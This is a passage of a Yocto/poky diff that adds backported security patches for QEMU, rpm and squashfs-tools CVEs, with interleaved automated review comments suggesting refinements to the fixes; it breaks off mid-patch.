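Review bot: When virgl_renderer_resource_attach_iov() fails, the new branch in virgl_resource_attach_backing() frees `res_iovs` but leaves `cmd->error` untouched, so the guest would presumably be told the attach succeeded. Adding `cmd->error = VIRTIO_GPU_RESP_ERR_UNSPEC;` inside the `if (ret != 0)` block would match how vg_resource_attach_backing() in main.c reports a mapping failure. `ret` is declared outside the hunk, and the function starts before it.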
@@ -0,0 +1,41 @@ +From 121841b25d72d13f8cad554363138c360f1250ea Mon Sep 17 00:00:00 2001 +From: Li Qiang <liq3ea@163.com> +Date: Sat, 15 May 2021 20:03:56 -0700 +Subject: [PATCH] vhost-user-gpu: fix memory disclosure in + virgl_cmd_get_capset_info (CVE-2021-3545) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Otherwise some of the 'resp' will be leaked to guest. + +Fixes: CVE-2021-3545 +Reported-by: Li Qiang <liq3ea@163.com> +virtio-gpu fix: 42a8dadc74 ("virtio-gpu: fix information leak +in getting capset info dispatch") + +Signed-off-by: Li Qiang <liq3ea@163.com> +Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210516030403.107723-2-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2021-3545 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + contrib/vhost-user-gpu/virgl.c | 1 + + 1 file changed, 1 insertion(+) + +Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +@@ -132,6 +132,7 @@ virgl_cmd_get_capset_info(VuGpu *g, + + VUGPU_FILL_CMD(info); + ++ memset(&resp, 0, sizeof(resp)); + if (info.capset_index == 0) { + resp.capset_id = VIRTIO_GPU_CAPSET_VIRGL; + virgl_renderer_get_cap_set(resp.capset_id, diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch new file mode 100644 index 0000000000..f8da428233 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3546.patch 
@@ -0,0 +1,47 @@ +From 9f22893adcb02580aee5968f32baa2cd109b3ec2 Mon Sep 17 00:00:00 2001 +From: Li Qiang <liq3ea@163.com> +Date: Sat, 15 May 2021 20:04:02 -0700 +Subject: [PATCH] vhost-user-gpu: fix OOB write in 'virgl_cmd_get_capset' + (CVE-2021-3546) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +If 'virgl_cmd_get_capset' set 'max_size' to 0, +the 'virgl_renderer_fill_caps' will write the data after the 'resp'. +This patch avoid this by checking the returned 'max_size'. + +virtio-gpu fix: abd7f08b23 ("display: virtio-gpu-3d: check +virgl capabilities max_size") + +Fixes: CVE-2021-3546 +Reported-by: Li Qiang <liq3ea@163.com> +Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org> +Signed-off-by: Li Qiang <liq3ea@163.com> +Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210516030403.107723-8-liq3ea@163.com> +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> + +Upstream-Status: Backport +CVE: CVE-2021-3546 +Signed-off-by: Armin Kuster <akuster@mvista.com> + +--- + contrib/vhost-user-gpu/virgl.c | 4 ++++ + 1 file changed, 4 insertions(+) + +Index: qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +=================================================================== +--- qemu-4.2.0.orig/contrib/vhost-user-gpu/virgl.c ++++ qemu-4.2.0/contrib/vhost-user-gpu/virgl.c +@@ -174,6 +174,10 @@ virgl_cmd_get_capset(VuGpu *g, + + virgl_renderer_get_cap_set(gc.capset_id, &max_ver, + &max_size); ++ if (!max_size) { ++ cmd->error = VIRTIO_GPU_RESP_ERR_INVALID_PARAMETER; ++ return; ++ } + resp = g_malloc0(sizeof(*resp) + max_size); + + resp->hdr.type = VIRTIO_GPU_RESP_OK_CAPSET; diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch new file mode 100644 index 0000000000..7a88e29384 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3582.patch 
@@ -0,0 +1,47 @@ +From 284f191b4abad213aed04cb0458e1600fd18d7c4 Mon Sep 17 00:00:00 2001 +From: Marcel Apfelbaum <marcel@redhat.com> +Date: Wed, 16 Jun 2021 14:06:00 +0300 +Subject: [PATCH] hw/rdma: Fix possible mremap overflow in the pvrdma device + (CVE-2021-3582) + +Ensure mremap boundaries not trusting the guest kernel to +pass the correct buffer length. + +Fixes: CVE-2021-3582 +Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com> +Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com> +Signed-off-by: Marcel Apfelbaum <marcel@redhat.com> +Message-Id: <20210616110600.20889-1-marcel.apfelbaum@gmail.com> +Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com> +Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com> +Reviewed-by: Prasad J Pandit <pjp@fedoraproject.org> +Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> + +CVE: CVE-2021-3582 +Upstream-Status: Backport [284f191b4abad213aed04cb0458e1600fd18d7c4] +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/rdma/vmw/pvrdma_cmd.c | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/hw/rdma/vmw/pvrdma_cmd.c b/hw/rdma/vmw/pvrdma_cmd.c +index f59879e257..da7ddfa548 100644 +--- a/hw/rdma/vmw/pvrdma_cmd.c ++++ b/hw/rdma/vmw/pvrdma_cmd.c +@@ -38,6 +38,13 @@ static void *pvrdma_map_to_pdir(PCIDevice *pdev, uint64_t pdir_dma, + return NULL; + } + ++ length = ROUND_UP(length, TARGET_PAGE_SIZE); ++ if (nchunks * TARGET_PAGE_SIZE != length) { ++ rdma_error_report("Invalid nchunks/length (%u, %lu)", nchunks, ++ (unsigned long)length); ++ return NULL; ++ } ++ + dir = rdma_pci_dma_map(pdev, pdir_dma, TARGET_PAGE_SIZE); + if (!dir) { + rdma_error_report("Failed to map to page directory"); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch new file mode 100644 index 0000000000..0547c74484 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3607.patch 
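Review bot: The new bound check multiplies before widening. In `nchunks * TARGET_PAGE_SIZE != length`, nchunks is printed with `%u` in the same hunk, so it is presumably a 32-bit unsigned value; if TARGET_PAGE_SIZE is an int, the product is computed in 32 bits and can wrap before it is compared with length. Widening first, `if ((uint64_t)nchunks * TARGET_PAGE_SIZE != length) {`, keeps the comparison exact for any guest-supplied count. The parameter types of pvrdma_map_to_pdir are declared outside the hunk, so confirm them before changing the backport.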
@@ -0,0 +1,43 @@ +From 32e5703cfea07c91e6e84bcb0313f633bb146534 Mon Sep 17 00:00:00 2001 +From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> +Date: Wed, 30 Jun 2021 14:46:34 +0300 +Subject: [PATCH] pvrdma: Ensure correct input on ring init (CVE-2021-3607) + +Check the guest passed a non zero page count +for pvrdma device ring buffers. + +Fixes: CVE-2021-3607 +Reported-by: VictorV (Kunlun Lab) <vv474172261@gmail.com> +Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com> +Signed-off-by: Marcel Apfelbaum <marcel@redhat.com> +Message-Id: <20210630114634.2168872-1-marcel@redhat.com> +Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com> +Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com> +Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> + +CVE: CVE-2021-3607 +Upstream-Status: Backport [32e5703cfea07c91e6e84bcb0313f633bb146534] +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/rdma/vmw/pvrdma_main.c | 5 +++++ + 1 file changed, 5 insertions(+) + +diff --git a/hw/rdma/vmw/pvrdma_main.c b/hw/rdma/vmw/pvrdma_main.c +index 84ae8024fc..7c0c3551a8 100644 +--- a/hw/rdma/vmw/pvrdma_main.c ++++ b/hw/rdma/vmw/pvrdma_main.c +@@ -92,6 +92,11 @@ static int init_dev_ring(PvrdmaRing *ring, PvrdmaRingState **ring_state, + uint64_t *dir, *tbl; + int rc = 0; + ++ if (!num_pages) { ++ rdma_error_report("Ring pages count must be strictly positive"); ++ return -EINVAL; ++ } ++ + dir = rdma_pci_dma_map(pci_dev, dir_addr, TARGET_PAGE_SIZE); + if (!dir) { + rdma_error_report("Failed to map to page directory (ring %s)", name); +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch new file mode 100644 index 0000000000..7055ec3d23 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3608.patch 
@@ -0,0 +1,40 @@ +From 66ae37d8cc313f89272e711174a846a229bcdbd3 Mon Sep 17 00:00:00 2001 +From: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> +Date: Wed, 30 Jun 2021 14:52:46 +0300 +Subject: [PATCH] pvrdma: Fix the ring init error flow (CVE-2021-3608) +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Do not unmap uninitialized dma addresses. + +Fixes: CVE-2021-3608 +Reviewed-by: VictorV (Kunlun Lab) <vv474172261@gmail.com> +Tested-by: VictorV (Kunlun Lab) <vv474172261@gmail.com> +Signed-off-by: Marcel Apfelbaum <marcel@redhat.com> +Message-Id: <20210630115246.2178219-1-marcel@redhat.com> +Tested-by: Yuval Shaia <yuval.shaia.ml@gmail.com> +Reviewed-by: Yuval Shaia <yuval.shaia.ml@gmail.com> +Reviewed-by: Philippe Mathieu-Daudé <philmd@redhat.com> +Signed-off-by: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> + +CVE: CVE-2021-3608 +Upstream-Status: Backport [66ae37d8cc313f89272e711174a846a229bcdbd3] +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/rdma/vmw/pvrdma_dev_ring.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +Index: qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c +=================================================================== +--- qemu-4.2.0.orig/hw/rdma/vmw/pvrdma_dev_ring.c ++++ qemu-4.2.0/hw/rdma/vmw/pvrdma_dev_ring.c +@@ -41,7 +41,7 @@ int pvrdma_ring_init(PvrdmaRing *ring, c + atomic_set(&ring->ring_state->cons_head, 0); + */ + ring->npages = npages; +- ring->pages = g_malloc(npages * sizeof(void *)); ++ ring->pages = g_malloc0(npages * sizeof(void *)); + + for (i = 0; i < npages; i++) { + if (!tbl[i]) { diff --git a/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch new file mode 100644 index 0000000000..50a49233d3 --- /dev/null +++ b/poky/meta/recipes-devtools/qemu/qemu/CVE-2021-3682.patch 
@@ -0,0 +1,41 @@ +From 5e796671e6b8d5de4b0b423dce1b3eba144a92c9 Mon Sep 17 00:00:00 2001 +From: Gerd Hoffmann <kraxel@redhat.com> +Date: Thu, 22 Jul 2021 09:27:56 +0200 +Subject: [PATCH] usbredir: fix free call +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +data might point into the middle of a larger buffer, there is a separate +free_on_destroy pointer passed into bufp_alloc() to handle that. It is +only used in the normal workflow though, not when dropping packets due +to the queue being full. Fix that. + +Resolves: https://gitlab.com/qemu-project/qemu/-/issues/491 +Signed-off-by: Gerd Hoffmann <kraxel@redhat.com> +Reviewed-by: Marc-André Lureau <marcandre.lureau@redhat.com> +Message-Id: <20210722072756.647673-1-kraxel@redhat.com> + +CVE: CVE-2021-3682 +Upstream-Status: Backport [5e796671e6b8d5de4b0b423dce1b3eba144a92c9] +Signed-off-by: Sakib Sajal <sakib.sajal@windriver.com> +--- + hw/usb/redirect.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/hw/usb/redirect.c b/hw/usb/redirect.c +index 4ec9326e05..1ec909a63a 100644 +--- a/hw/usb/redirect.c ++++ b/hw/usb/redirect.c +@@ -476,7 +476,7 @@ static int bufp_alloc(USBRedirDevice *dev, uint8_t *data, uint16_t len, + if (dev->endpoint[EP2I(ep)].bufpq_dropping_packets) { + if (dev->endpoint[EP2I(ep)].bufpq_size > + dev->endpoint[EP2I(ep)].bufpq_target_size) { +- free(data); ++ free(free_on_destroy); + return -1; + } + dev->endpoint[EP2I(ep)].bufpq_dropping_packets = 0; +-- +2.25.1 + diff --git a/poky/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch b/poky/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch index 6454785254..dc3f74fecd 100644 --- a/poky/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch +++ b/poky/meta/recipes-devtools/rpm/files/0001-rpm-rpmio.c-restrict-virtual-memory-usage-if-limit-s.patch 
@@ -11,36 +11,39 @@ CPU thread. Upstream-Status: Pending [merge of multithreading patches to upstream] Signed-off-by: Peter Bergin <peter@berginkonsult.se> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> --- - rpmio/rpmio.c | 34 ++++++++++++++++++++++++++++++++++ - 1 file changed, 34 insertions(+) + rpmio/rpmio.c | 36 ++++++++++++++++++++++++++++++++++++ + 1 file changed, 36 insertions(+) diff --git a/rpmio/rpmio.c b/rpmio/rpmio.c index e051c98..b3c56b6 100644 --- a/rpmio/rpmio.c 
+++ b/rpmio/rpmio.c -@@ -845,6 +845,40 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz) +@@ -845,6 +845,42 @@ static LZFILE *lzopen_internal(const char *mode, int fd, int xz) } #endif -+ struct rlimit virtual_memory; -+ getrlimit(RLIMIT_AS, &virtual_memory); -+ if (virtual_memory.rlim_cur != RLIM_INFINITY) { ++ struct rlimit virtual_memory = {RLIM_INFINITY , RLIM_INFINITY}; ++ int status = getrlimit(RLIMIT_AS, &virtual_memory); ++ if ((status != -1) && (virtual_memory.rlim_cur != RLIM_INFINITY)) { + const uint64_t virtual_memlimit = virtual_memory.rlim_cur; ++ uint32_t threads_max = lzma_cputhreads(); + const uint64_t virtual_memlimit_per_cpu_thread = -+ virtual_memlimit / lzma_cputhreads(); -+ uint64_t memory_usage_virt; ++ virtual_memlimit / ((threads_max == 0) ? 1 : threads_max); + rpmlog(RPMLOG_NOTICE, "XZ: virtual memory restricted to %lu and " + "per CPU thread %lu\n", virtual_memlimit, virtual_memlimit_per_cpu_thread); ++ uint64_t memory_usage_virt; + /* keep reducing the number of compression threads until memory + usage falls below the limit per CPU thread*/ + while ((memory_usage_virt = lzma_stream_encoder_mt_memusage(&mt_options)) > + virtual_memlimit_per_cpu_thread) { -+ /* If number of threads goes down to zero lzma_stream_encoder will -+ * will return UINT64_MAX. We must check here to avoid an infinite loop. ++ /* If number of threads goes down to zero or in case of any other error ++ * lzma_stream_encoder_mt_memusage will return UINT64_MAX. We must check ++ * for both the cases here to avoid an infinite loop. + * If we get into situation that one thread requires more virtual memory + * than available we set one thread, print error message and try anyway. */ -+ if (--mt_options.threads == 0) { ++ if ((--mt_options.threads == 0) || (memory_usage_virt == UINT64_MAX)) { + mt_options.threads = 1; + rpmlog(RPMLOG_WARNING, + "XZ: Could not adjust number of threads to get below " 
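Review bot: The `rpmlog(RPMLOG_NOTICE, ...)` call kept in this block prints `virtual_memlimit` and `virtual_memlimit_per_cpu_thread`, both declared uint64_t, with `%lu`; that only matches where unsigned long is 64 bits wide. Since the block is being reworked anyway, the format could use PRIu64: `"XZ: virtual memory restricted to %" PRIu64 " and per CPU thread %" PRIu64 "\n"`, adding `<inttypes.h>` if rpmio.c does not already include it. The enclosing lzopen_internal() continues past the end of the hunk, so the rest of the thread-reduction loop is not visible here.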
diff --git a/poky/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch b/poky/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
new file mode 100644
index 0000000000..f2fc47e321
--- /dev/null
+++ b/poky/meta/recipes-devtools/rpm/files/CVE-2021-20266.patch
@@ -0,0 +1,109 @@ +From ebbf0f0133c498d229e94ecf2ed0b41d6e6a142a Mon Sep 17 00:00:00 2001 +From: Demi Marie Obenour <athena@invisiblethingslab.com> +Date: Mon, 8 Feb 2021 16:05:01 -0500 +Subject: [PATCH] hdrblobInit() needs bounds checks too + +Users can pass untrusted data to hdrblobInit() and it must be robust +against this. + +Backported from commit 8f4b3c3cab8922a2022b9e47c71f1ecf906077ef + +Upstream-Status: Backport [https://github.com/rpm-software-management/rpm/pull/1587/commits/9646711891df851dfbf7ef54cc171574a0914b15] +CVE: CVE-2021-20266 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + lib/header.c | 48 +++++++++++++++++++++++++++++++----------------- + 1 file changed, 31 insertions(+), 17 deletions(-) + +diff --git a/lib/header.c b/lib/header.c +index 5b09f8352..ad5b6dc57 100644 +--- a/lib/header.c ++++ b/lib/header.c +@@ -11,6 +11,7 @@ + #include "system.h" + #include <netdb.h> + #include <errno.h> ++#include <inttypes.h> + #include <rpm/rpmtypes.h> + #include <rpm/rpmstring.h> + #include "lib/header_internal.h" +@@ -1890,6 +1891,25 @@ hdrblob hdrblobFree(hdrblob blob) + return NULL; + } + ++static rpmRC hdrblobVerifyLengths(rpmTagVal regionTag, uint32_t il, uint32_t dl, ++ char **emsg) { ++ uint32_t il_max = HEADER_TAGS_MAX; ++ uint32_t dl_max = HEADER_DATA_MAX; ++ if (regionTag == RPMTAG_HEADERSIGNATURES) { ++ il_max = 32; ++ dl_max = 8192; ++ } ++ if (hdrchkRange(il_max, il)) { ++ rasprintf(emsg, _("hdr tags: BAD, no. of tags(%" PRIu32 ") out of range"), il); ++ return RPMRC_FAIL; ++ } ++ if (hdrchkRange(dl_max, dl)) { ++ rasprintf(emsg, _("hdr data: BAD, no. 
of bytes(%" PRIu32 ") out of range"), dl); ++ return RPMRC_FAIL; ++ } ++ return RPMRC_OK; ++} ++ + rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrblob blob, char **emsg) + { + int32_t block[4]; +@@ -1902,13 +1922,6 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl + size_t nb; + rpmRC rc = RPMRC_FAIL; /* assume failure */ + int xx; +- int32_t il_max = HEADER_TAGS_MAX; +- int32_t dl_max = HEADER_DATA_MAX; +- +- if (regionTag == RPMTAG_HEADERSIGNATURES) { +- il_max = 32; +- dl_max = 8192; +- } + + memset(block, 0, sizeof(block)); + if ((xx = Freadall(fd, bs, blen)) != blen) { +@@ -1921,15 +1934,9 @@ rpmRC hdrblobRead(FD_t fd, int magic, int exact_size, rpmTagVal regionTag, hdrbl + goto exit; + } + il = ntohl(block[2]); +- if (hdrchkRange(il_max, il)) { +- rasprintf(emsg, _("hdr tags: BAD, no. of tags(%d) out of range"), il); +- goto exit; +- } + dl = ntohl(block[3]); +- if (hdrchkRange(dl_max, dl)) { +- rasprintf(emsg, _("hdr data: BAD, no. of bytes(%d) out of range"), dl); ++ if (hdrblobVerifyLengths(regionTag, il, dl, emsg)) + goto exit; +- } + + nb = (il * sizeof(struct entryInfo_s)) + dl; + uc = sizeof(il) + sizeof(dl) + nb; +@@ -1973,11 +1980,18 @@ rpmRC hdrblobInit(const void *uh, size_t uc, + struct hdrblob_s *blob, char **emsg) + { + rpmRC rc = RPMRC_FAIL; +- + memset(blob, 0, sizeof(*blob)); ++ if (uc && uc < 8) { ++ rasprintf(emsg, _("hdr length: BAD")); ++ goto exit; ++ } ++ + blob->ei = (int32_t *) uh; /* discards const */ +- blob->il = ntohl(blob->ei[0]); +- blob->dl = ntohl(blob->ei[1]); ++ blob->il = ntohl((uint32_t)(blob->ei[0])); ++ blob->dl = ntohl((uint32_t)(blob->ei[1])); ++ if (hdrblobVerifyLengths(regionTag, blob->il, blob->dl, emsg) != RPMRC_OK) ++ goto exit; ++ + blob->pe = (entryInfo) &(blob->ei[2]); + blob->pvlen = sizeof(blob->il) + sizeof(blob->dl) + + (blob->il * sizeof(*blob->pe)) + blob->dl; 
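Review bot: hdrblobInit() only rejects a short buffer when `uc` is non-zero: with `if (uc && uc < 8)`, a call with `uc == 0` skips the length check and the next lines still read `blob->ei[0]` and `blob->ei[1]`. If zero is meant as "size not known to the caller", that contract deserves a comment at the check, e.g. `/* uc == 0: size unknown, caller guarantees at least the 8-byte il/dl prefix */`; otherwise the condition should be `uc < 8`. The two callers of hdrblobVerifyLengths() also test its result differently (`if (hdrblobVerifyLengths(...))` in hdrblobRead, `!= RPMRC_OK` in hdrblobInit); the explicit comparison in both would read more clearly. hdrblobInit's full signature and tail are outside the hunk.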
diff --git a/poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb b/poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb index 018b2f8700..c39a5208e5 100644 --- a/poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb +++ b/poky/meta/recipes-devtools/rpm/rpm_4.14.2.1.bb @@ -24,7 +24,7 @@ HOMEPAGE = "http://www.rpm.org" LICENSE = "GPL-2.0" LIC_FILES_CHKSUM = "file://COPYING;md5=c0bf017c0fd1920e6158a333acabfd4a" -SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \ +SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x;protocol=https \ file://0001-Do-not-add-an-unsatisfiable-dependency-when-building.patch \ file://0001-Do-not-read-config-files-from-HOME.patch \ file://0001-When-cross-installing-execute-package-scriptlets-wit.patch \ @@ -45,6 +45,7 @@ SRC_URI = "git://github.com/rpm-software-management/rpm;branch=rpm-4.14.x \ file://0001-Rip-out-partial-support-for-unused-MD2-and-RIPEMD160.patch \ file://0001-rpmplugins.c-call-dlerror-prior-to-dlsym.patch \ file://CVE-2021-3421.patch \ + file://CVE-2021-20266.patch \ " PE = "1" @@ -61,7 +62,8 @@ export PYTHON_ABI # OE-core patches autoreconf to additionally run gnu-configize, which fails with this recipe EXTRA_AUTORECONF_append = " --exclude=gnu-configize" -EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl" +# Vendor is detected differently on x86 and aarch64 hosts and can feed into target packages +EXTRA_OECONF_append = " --without-lua --enable-python --with-crypto=openssl --with-vendor=pc" EXTRA_OECONF_append_libc-musl = " --disable-nls" # --sysconfdir prevents rpm from attempting to access machine-specific configuration in sysroot/etc; we need to have it in rootfs diff --git a/poky/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch b/poky/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch new file mode 100644 index 0000000000..95e2534ee4 --- /dev/null +++ b/poky/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch 
@@ -0,0 +1,253 @@ +Backport patch to fix CVE-2021-40153, and remove version update in unsquashfs.c +for compatible. + +Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/79b5a55] +CVE: CVE-2021-40153 + +Signed-off-by: Kai Kang <kai.kang@windriver.com> + +From 79b5a555058eef4e1e7ff220c344d39f8cd09646 Mon Sep 17 00:00:00 2001 +From: Phillip Lougher <phillip@squashfs.org.uk> +Date: Sat, 16 Jan 2021 20:08:55 +0000 +Subject: [PATCH] Unsquashfs: fix write outside destination directory exploit + +An issue on Github (https://github.com/plougher/squashfs-tools/issues/72) +shows how some specially crafted Squashfs filesystems containing +invalid file names (with '/' and ..) can cause Unsquashfs to write +files outside of the destination directory. + +This commit fixes this exploit by checking all names for +validity. + +In doing so I have also added checks for '.' and for names that +are shorter than they should be (names in the file system should +not have '\0' terminators). 
+ +Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk> +--- + squashfs-tools/Makefile | 5 ++- + squashfs-tools/unsquash-1.c | 9 +++++- + squashfs-tools/unsquash-1234.c | 58 ++++++++++++++++++++++++++++++++++ + squashfs-tools/unsquash-2.c | 9 +++++- + squashfs-tools/unsquash-3.c | 9 +++++- + squashfs-tools/unsquash-4.c | 9 +++++- + squashfs-tools/unsquashfs.h | 5 ++- + 7 files changed, 98 insertions(+), 6 deletions(-) + create mode 100644 squashfs-tools/unsquash-1234.c + +diff --git a/squashfs-tools/Makefile b/squashfs-tools/Makefile +index aee4b960..20feaca2 100644 +--- a/squashfs-tools/Makefile ++++ b/squashfs-tools/Makefile +@@ -156,7 +156,8 @@ MKSQUASHFS_OBJS = mksquashfs.o read_fs.o action.o swap.o pseudo.o compressor.o \ + caches-queues-lists.o + + UNSQUASHFS_OBJS = unsquashfs.o unsquash-1.o unsquash-2.o unsquash-3.o \ +- unsquash-4.o unsquash-123.o unsquash-34.o swap.o compressor.o unsquashfs_info.o ++ unsquash-4.o unsquash-123.o unsquash-34.o unsquash-1234.o swap.o \ ++ compressor.o unsquashfs_info.o + + CFLAGS ?= -O2 + CFLAGS += $(EXTRA_CFLAGS) $(INCLUDEDIR) -D_FILE_OFFSET_BITS=64 \ +@@ -350,6 +351,8 @@ unsquash-123.o: unsquashfs.h unsquash-123.c squashfs_fs.h squashfs_compat.h + + unsquash-34.o: unsquashfs.h unsquash-34.c + ++unsquash-1234.o: unsquash-1234.c ++ + unsquashfs_xattr.o: unsquashfs_xattr.c unsquashfs.h squashfs_fs.h xattr.h + + unsquashfs_info.o: unsquashfs.h squashfs_fs.h +diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c +index 34eced36..28326cb1 100644 +--- a/squashfs-tools/unsquash-1.c ++++ b/squashfs-tools/unsquash-1.c +@@ -2,7 +2,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. 
+ * +- * Copyright (c) 2009, 2010, 2011, 2012, 2019 ++ * Copyright (c) 2009, 2010, 2011, 2012, 2019, 2021 + * Phillip Lougher <phillip@squashfs.org.uk> + * + * This program is free software; you can redistribute it and/or +@@ -285,6 +285,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse + memcpy(dire->name, directory_table + bytes, + dire->size + 1); + dire->name[dire->size + 1] = '\0'; ++ ++ /* check name for invalid characters (i.e /, ., ..) */ ++ if(check_name(dire->name, dire->size + 1) == FALSE) { ++ ERROR("File system corrupted: invalid characters in name\n"); ++ goto corrupted; ++ } ++ + TRACE("squashfs_opendir: directory entry %s, inode " + "%d:%d, type %d\n", dire->name, + dirh.start_block, dire->offset, dire->type); +diff --git a/squashfs-tools/unsquash-1234.c b/squashfs-tools/unsquash-1234.c +new file mode 100644 +index 00000000..c2d4f42b +--- /dev/null ++++ b/squashfs-tools/unsquash-1234.c +@@ -0,0 +1,58 @@ ++/* ++ * Unsquash a squashfs filesystem. This is a highly compressed read only ++ * filesystem. ++ * ++ * Copyright (c) 2021 ++ * Phillip Lougher <phillip@squashfs.org.uk> ++ * ++ * This program is free software; you can redistribute it and/or ++ * modify it under the terms of the GNU General Public License ++ * as published by the Free Software Foundation; either version 2, ++ * or (at your option) any later version. ++ * ++ * This program is distributed in the hope that it will be useful, ++ * but WITHOUT ANY WARRANTY; without even the implied warranty of ++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ++ * GNU General Public License for more details. ++ * ++ * You should have received a copy of the GNU General Public License ++ * along with this program; if not, write to the Free Software ++ * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. ++ * ++ * unsquash-1234.c ++ * ++ * Helper functions used by unsquash-1, unsquash-2, unsquash-3 and ++ * unsquash-4. 
++ */ ++ ++#define TRUE 1 ++#define FALSE 0 ++/* ++ * Check name for validity, name should not ++ * - be ".", "./", or ++ * - be "..", "../" or ++ * - have a "/" anywhere in the name, or ++ * - be shorter than the expected size ++ */ ++int check_name(char *name, int size) ++{ ++ char *start = name; ++ ++ if(name[0] == '.') { ++ if(name[1] == '.') ++ name++; ++ if(name[1] == '/' || name[1] == '\0') ++ return FALSE; ++ } ++ ++ while(name[0] != '/' && name[0] != '\0') ++ name ++; ++ ++ if(name[0] == '/') ++ return FALSE; ++ ++ if((name - start) != size) ++ return FALSE; ++ ++ return TRUE; ++} +diff --git a/squashfs-tools/unsquash-2.c b/squashfs-tools/unsquash-2.c +index 4b3d767e..474064e1 100644 +--- a/squashfs-tools/unsquash-2.c ++++ b/squashfs-tools/unsquash-2.c +@@ -2,7 +2,7 @@ + * Unsquash a squashfs filesystem. This is a highly compressed read only + * filesystem. + * +- * Copyright (c) 2009, 2010, 2013, 2019 ++ * Copyright (c) 2009, 2010, 2013, 2019, 2021 + * Phillip Lougher <phillip@squashfs.org.uk> + * + * This program is free software; you can redistribute it and/or +@@ -386,6 +386,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse + memcpy(dire->name, directory_table + bytes, + dire->size + 1); + dire->name[dire->size + 1] = '\0'; ++ ++ /* check name for invalid characters (i.e /, ., ..) */ ++ if(check_name(dire->name, dire->size + 1) == FALSE) { ++ ERROR("File system corrupted: 